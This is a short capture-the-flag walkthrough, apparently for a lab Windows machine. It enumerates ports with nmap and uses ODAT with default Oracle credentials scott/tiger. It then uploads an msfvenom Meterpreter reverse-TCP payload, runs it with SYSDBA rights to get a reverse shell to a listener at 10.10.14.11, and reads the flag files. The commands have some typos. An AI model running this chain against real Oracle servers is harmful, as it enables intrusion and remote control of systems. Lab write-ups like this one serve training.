Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
export ip=10.10.10.82
ping $ip # TTL 127 - windows?
nmap -p- $ip # port 80,135,139,445,1521,5985,47001
nmap -p -sC -sV $ip
Ports:
| Port | Version | Notes |
|---|---|---|
| 80 | iis 8.5 | trace |
| 135 | msrpc | |
| 139 | netbios-ssn | |
| 445 | microsoft-ds | |
| 1521 | microsoft-ds | Windows Server 2008 R2 - 2012 |
| 49152-49155 | msrpc | |
| 49159/tcp | oracle-tns | |
| 49160-49161 | msrpc |
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
Oracle TNS Enumeration
Enumerate the exposed TNS Listener with the ODAT tool:
sudo odate all $ip
# SID: XE
# Service Name: XE,EXEDB
# Credentials: Scott/Tiger found
nmap --script "oracle-tns-version" -p 1521 -T4 -sV
# 11.2.0.2.0
Oracle TNS File Upload, RCE to Reverse Shell
Creating a payload with metasploit, uploading it with odat tool and using odat tool to trigger payload execution back to a metasploit listener.
# make payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.11 lport=4444 -f exe > access.exe
# upload
odat utlfile -s $ip -U scott -P tiger -d XE --sysdba --putFile c:/ access.exe /tmp/access.exe
# reverse listener
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
run
# RCE the payload
odat externaltable -s $ip -U scott -P tiger -d XE --sysdba --exec c:/ access.exe
Flags
getuid
# NT Auth
cat c:/users/Phineas/Desktop/user.txt
cat c:/users/Administrator/Desktop/root.txt